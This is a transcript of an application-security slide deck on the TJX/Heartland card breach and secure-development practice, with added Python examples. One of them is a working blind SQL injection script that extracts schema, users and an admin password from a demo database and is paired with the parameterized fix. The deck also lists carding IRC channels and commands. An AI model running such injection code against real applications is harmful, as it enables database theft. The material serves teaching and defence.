application security - enterprise...
TRANSCRIPT
![Page 1: Application Security - Enterprise Strategiessecuritybyte.org/.../application-security-enterprise-strategies.pdf · OWASP Secure Coding Guides. ... () OWASP Testing Guide Tools of](https://reader038.vdocuments.us/reader038/viewer/2022102812/5ac5bd727f8b9a2b5c8dcc4a/html5/thumbnails/1.jpg)
Application Security – Enterprise Strategies
K. K. Mookhey, CISA, CISSP, CISM, Principal Consultant
www.niiconsulting.com
Agenda
• The Biggest Hack in History
• How the Cookie Crumbles?
• Answers!
Speaker Introduction
• Founder & Principal Consultant, Network Intelligence
• Speaker at Blackhat 2004, Interop 2005, IT Underground 2005, OWASP Asia 2008, 2009
• Co-author of books on the Metasploit Framework (Syngress) and Linux Security & Controls (ISACA)
• Author of numerous articles on SecurityFocus, IT Audit, IS Controls (ISACA)
• Conducted numerous pen-tests, application security assessments, forensics, etc.
THE BIGGEST HACK IN HISTORY
Gonzalez, TJX and Heart-break-land
• >200 million credit card numbers stolen
• Heartland Payment Systems, TJX, and 2 US national retailers hacked
• Modus operandi
– Visit retail stores to understand workings
– Analyze websites for vulnerabilities
– Hack in using SQL injection
– Inject malware
– Sniff for card numbers and details
– Hide tracks
The hacker underground
• Albert Gonzalez
– a/k/a “segvec,”
– a/k/a “soupnazi,”
– a/k/a “j4guar17”
• Malware, scripts and hacked data hosted on servers in:
– Latvia
– Netherlands
– Ukraine
– New Jersey
– California
• IRC chats
– March 2007: Gonzalez “planning my second phase against Hannaford”
– December 2007: Hacker P.T. “that’s how [HACKER 2] hacked Hannaford.”
Where does all this end up?
• IRC channels: #cc, #ccards, #ccinfo, #ccpower, #ccs, #masterccs, #thacc, #thecc, #virgincc
• Commands used on IRC
– !cardable
– !cc, !cclimit, !chk, !cvv2, !exploit, !order.log, !proxychk
TJX direct costs
$24 million to Mastercard
$41 million to Visa
$200 million in fines/penalties
Cost of an incident
• $6.6 million average cost of a data breach
• Of this, the cost of lost business is $4.6 million
• More than $200 per compromised record
On the other hand:
• Fixing a bug costs $400 to $4,000
• Cost increases exponentially the later the bug is fixed
How the Cookie Crumbles
[Pages 11-20: screenshot-only slides; no text was extracted]
Betting blind!
• DB Name
• Table Names
• User IDs
• Table Structure
• Data
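The slide above lists what a blind SQL injection hands an attacker through nothing more than a yes/no difference in the application's response. The following script is an added example and is not part of the original deck: it builds a constructed in-memory SQLite database, runs a hypothetical login handler that pastes user input into its SQL, and recovers table names, table structure, user IDs and data through that one-bit oracle by binary search. It then shows the same payload doing nothing against a parameterized version of the query. Every table name, account and value here is invented for the demo.

```python
import sqlite3
from typing import Callable

# Constructed demo schema and rows; every name and value here is invented.
SCHEMA = """
CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO users VALUES (1, 'admin', 'S3cr3t!');
INSERT INTO users VALUES (2, 'alice', 'wonderland');
CREATE TABLE cards (id INTEGER PRIMARY KEY, holder TEXT, pan TEXT);
INSERT INTO cards VALUES (1, 'Alice', '4111111111111111');
"""


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Hypothetical handler that pastes input into SQL. The caller only learns
    # True ("welcome") or False ("bad login"): a one-bit oracle is all blind SQLi needs.
    sql = "SELECT id FROM users WHERE username = '%s' AND password = '%s'" % (username, password)
    return conn.execute(sql).fetchone() is not None


def login_fixed(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Same query with bound parameters: the input is data and is never parsed as SQL.
    sql = "SELECT id FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


class BlindExtractor:
    """Recovers the text of any SQL expression through a boolean oracle by binary search."""

    def __init__(self, oracle: Callable[[str, str], bool]):
        self.oracle = oracle
        self.requests = 0

    def ask(self, condition: str) -> bool:
        # ' OR (<cond>) --  closes the string literal, makes WHERE true for every row
        # exactly when <cond> holds, and comments out the password clause.
        self.requests += 1
        return self.oracle("' OR (%s) -- " % condition, "x")

    def _search(self, gt: Callable[[int], str], lo: int, hi: int) -> int:
        # Smallest v in [lo, hi] for which "value > v" is false, i.e. the value itself.
        while lo < hi:
            mid = (lo + hi) // 2
            if self.ask(gt(mid)):
                lo = mid + 1
            else:
                hi = mid
        return lo

    def extract(self, expr: str) -> str:
        length = self._search(lambda v: "length((%s)) > %d" % (expr, v), 0, 256)
        chars = []
        for pos in range(1, length + 1):
            # unicode() and substr() are SQLite built-ins; printable ASCII is assumed.
            code = self._search(
                lambda v: "unicode(substr((%s), %d, 1)) > %d" % (expr, pos, v), 32, 126)
            chars.append(chr(code))
        return "".join(chars)


def enumerate_database(conn: sqlite3.Connection) -> dict:
    """Walks the slide's list: table names, table structure, user IDs, data."""
    ex = BlindExtractor(lambda u, p: login_vulnerable(conn, u, p))
    n_tables = int(ex.extract("SELECT count(*) FROM sqlite_master WHERE type='table'"))
    tables = [ex.extract("SELECT name FROM sqlite_master WHERE type='table' "
                         "ORDER BY name LIMIT 1 OFFSET %d" % i) for i in range(n_tables)]
    structure = ex.extract("SELECT sql FROM sqlite_master WHERE name='users'")
    n_users = int(ex.extract("SELECT count(*) FROM users"))
    users = [ex.extract("SELECT username FROM users ORDER BY id LIMIT 1 OFFSET %d" % i)
             for i in range(n_users)]
    admin_password = ex.extract("SELECT password FROM users WHERE username='admin'")
    return {"tables": tables, "structure": structure, "users": users,
            "admin_password": admin_password, "requests": ex.requests}


def injection_blocked(conn: sqlite3.Connection) -> bool:
    """True when the classic payload fails against the parameterized handler
    while a genuine login still succeeds."""
    payload = "' OR (1=1) -- "
    return (not login_fixed(conn, payload, "x")) and login_fixed(conn, "admin", "S3cr3t!")


if __name__ == "__main__":
    db = make_db()
    for key, value in enumerate_database(db).items():
        print("%s: %s" % (key, value))
    print("payload works against vulnerable handler:", login_vulnerable(db, "' OR (1=1) -- ", "x"))
    print("payload blocked by parameterized handler:", injection_blocked(db))
```

Each recovered character costs about seven oracle requests, and the `requests` counter makes that visible: a blind injection is slow but entirely automatable, and it is also noisy in web-server logs, which is why a detection rule on bursts of near-identical requests whose only difference is a numeric payload is worth having alongside the parameterized fix.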
Net Result
Enterprise Owned!
Other aspects
App2App Communication
• App2App interaction requires an authentication process
– Calling application needs to send credentials to target application
• Common use cases
– Applications and scripts connecting to databases
– 3rd party products accessing network resources
– Job scheduling
– Application server connection pools
– Distributed computing centers
– Application encryption key management
– ATMs, kiosks, etc.
Answers!
Technology Solutions
• Web Application Firewalls
• Privileged Identity Management Suites
• Application-Aware Firewalls
• Application-Aware SIEMs
• Database Access Management Solutions
Before we get to the technology…
Application Security – Holistic Solution
(Lifecycle diagram: Design, Develop/Manage, Test, Train)
Secure Design
• Secure design models
• Client inputs
• Client education
• Threat modeling
• Vulnerability classification – STRIDE
• Risk classification – DREAD
Microsoft’s Threat Modeling Tool
Secure Coding Overview
Secure coding isn’t taught in school
• Building Security In Maturity Model (BSIMM)
• Homeland Security's Build Security In (BSI) portal
• Microsoft's Security Development Lifecycle (SDL)
• OpenSAMM (Software Assurance Maturity Model)
• OWASP Secure Coding Guides
Secure Coding Principles
1. Minimize attack surface area
2. Establish secure defaults
3. Principle of least privilege
4. Principle of defense in depth
5. Fail securely
6. Don’t trust input – user or services
7. Separation of duties
8. Avoid security by obscurity
9. Keep security simple
10. Fix security issues correctly
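Principles 2, 3, 5, 6 and 7 are the ones most often violated in authorization code, so here they are in one small check. This is an added example written for this page, not code from the deck or from any product it names; the roles, actions, `PermissionStore` class and order records are invented for illustration.

```python
import logging
import re
from dataclasses import dataclass

log = logging.getLogger("authz")

# Principle 3 (least privilege): each role is an explicit allow-list of actions.
# There is no wildcard and no default role. Roles and actions are invented for this example.
ROLE_PERMISSIONS = {
    "clerk": {"order:read", "order:create"},
    "manager": {"order:read", "order:create", "order:refund"},
}

# Principle 6 (don't trust input): an action name must match a strict grammar
# before it is used in any lookup.
ACTION_RE = re.compile(r"[a-z]+:[a-z]+")


class PermissionStore:
    """Stand-in for a directory or database that may be unreachable (constructed for the demo)."""

    def __init__(self, roles_by_user: dict, available: bool = True):
        self.roles_by_user = roles_by_user
        self.available = available

    def roles_for(self, user: str) -> set:
        if not self.available:
            raise ConnectionError("permission store unreachable")
        return self.roles_by_user.get(user, set())


def is_allowed(store: PermissionStore, user: str, action: str) -> bool:
    """Deny by default (principle 2), validate input (6), fail closed on error (5)."""
    if not isinstance(action, str) or not ACTION_RE.fullmatch(action):
        return False
    try:
        roles = store.roles_for(user)
    except Exception:
        # Principle 5 (fail securely): an error inside the check is never a grant.
        log.warning("authorization lookup failed for %r; denying", user)
        return False
    return any(action in ROLE_PERMISSIONS.get(role, set()) for role in roles)


def is_allowed_fail_open(store: PermissionStore, user: str, action: str) -> bool:
    """The anti-pattern: the same policy, but an outage turns into a grant."""
    try:
        roles = store.roles_for(user)
    except Exception:
        return True  # "don't lock everyone out during an outage" is failing open
    return any(action in ROLE_PERMISSIONS.get(role, set()) for role in roles)


@dataclass(frozen=True)
class Order:
    order_id: int
    created_by: str
    amount: int


def can_refund(store: PermissionStore, approver: str, order: Order) -> bool:
    """Principle 7 (separation of duties): whoever raised the order may not refund it,
    even when they hold the refund right."""
    if approver == order.created_by:
        return False
    return is_allowed(store, approver, "order:refund")


if __name__ == "__main__":
    live = PermissionStore({"bob": {"clerk"}, "mary": {"manager"}})
    down = PermissionStore({"bob": {"clerk"}}, available=False)
    print("clerk reads order:", is_allowed(live, "bob", "order:read"))
    print("clerk refunds:", is_allowed(live, "bob", "order:refund"))
    print("store down, fail closed:", is_allowed(down, "bob", "order:read"))
    print("store down, fail open:", is_allowed_fail_open(down, "bob", "order:refund"))
    print("manager refunds own order:", can_refund(live, "mary", Order(1, "mary", 100)))
```

The two `is_allowed` variants differ by a single line in the `except` branch, which is the usual size of a fail-open bug; reviewing every authorization path for what it returns when its dependency is unavailable is a cheap check to add to code review.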
Vendor Management
• Big names != good security
• Contractual weaknesses
• Lack of vendor oversight
• No penalties for blatantly buggy code!
Secure Hosting
• Web Security
– Secured web server
– Secured application server – all components
– Web application firewalls
• OS Security
– Security patches
– Users and groups
– Access control
– Security policies
– Secured login
– Logging
• Database Security
– Security patches
– Users and roles
– Access control
– Logging
– Password security
– Database table encryption
– Data masking
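Data masking and logging from the database list above, made concrete for the card data that the Gonzalez case was about. This is an added example and not part of the deck: Luhn validation and first-six/last-four PAN masking in Python, a redactor that masks card numbers in a log line before it is written, and a SQLite view that masks at the database layer so reporting users never query the raw column. The log line, card numbers and table are constructed test values (the PANs are industry test numbers, not real cards).

```python
import re
import sqlite3

# Candidate PAN in free text: 13 to 19 digits, optionally separated by single spaces
# or hyphens, not glued to other digits. A constructed rule for this example.
PAN_RE = re.compile(r"(?<![\d])(?:\d[ -]?){12,18}\d(?![\d])")


def luhn_valid(digits: str) -> bool:
    """Luhn mod-10 check; filters order IDs and timestamps out of PAN-shaped digit runs."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def mask_pan(pan: str) -> str:
    """Keep at most the first six and last four digits (the PCI DSS display rule)."""
    digits = re.sub(r"\D", "", pan)
    if not 13 <= len(digits) <= 19:
        raise ValueError("not a PAN-length digit string")
    return digits[:6] + "*" * (len(digits) - 10) + digits[-4:]


def redact_pans(text: str) -> str:
    """Mask every Luhn-valid PAN in a log line or error message before it is written."""
    def repl(m):
        digits = re.sub(r"\D", "", m.group(0))
        return mask_pan(digits) if luhn_valid(digits) else m.group(0)
    return PAN_RE.sub(repl, text)


def demo_db() -> sqlite3.Connection:
    # Constructed rows; the PANs are well-known test numbers, not real cards.
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE cards (id INTEGER PRIMARY KEY, holder TEXT, pan TEXT);
        INSERT INTO cards VALUES (1, 'Alice', '4111111111111111');
        INSERT INTO cards VALUES (2, 'Bob',   '5500000000000004');
    """)
    return conn


def masked_card_rows(conn: sqlite3.Connection) -> list:
    """Database-side masking: reporting users are pointed at the view, never the raw column.
    substr(pan, -4) is SQLite's 'last four characters'; the asterisk literal is cut to length."""
    conn.executescript(
        "CREATE VIEW IF NOT EXISTS cards_masked AS "
        "SELECT id, holder, substr(pan, 1, 6) || substr('*******************', 1, length(pan) - 10) "
        "|| substr(pan, -4) AS pan_masked FROM cards;")
    return conn.execute("SELECT id, holder, pan_masked FROM cards_masked ORDER BY id").fetchall()


if __name__ == "__main__":
    line = "2009-10-01 12:00:05 checkout ok pan=4111 1111 1111 1111 order=1234567890123456 ip=10.0.0.12"
    print(redact_pans(line))
    for row in masked_card_rows(demo_db()):
        print(row)
```

The Luhn filter matters for the log redactor: without it every 16-digit order or transaction ID would be masked too, and operators would stop trusting the logs. On a real database engine with grants, the pattern is the same: the application account gets the view, only the payment service gets the base table.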
Secure Testing
• Security testing options
– Blackbox
– Greybox
– Whitebox
– Source code review
• OWASP Top Ten (www.owasp.org)
• OWASP Testing Guide
• Tools of the trade
– Open source – Wikto, Paros, WebScarab, Firefox plugins
– Commercial – Acunetix, Cenzic, Netsparker, Burp Suite
Training
• Back to basics
• Natural thought process
• Look at the larger picture
• Make it fun
• Giving back to the community
Application Security Vision
(Lifecycle diagram: Design, Develop/Manage, Test, Train)
Thank you! Questions?
Information Security Consulting Services
Institute of Information Security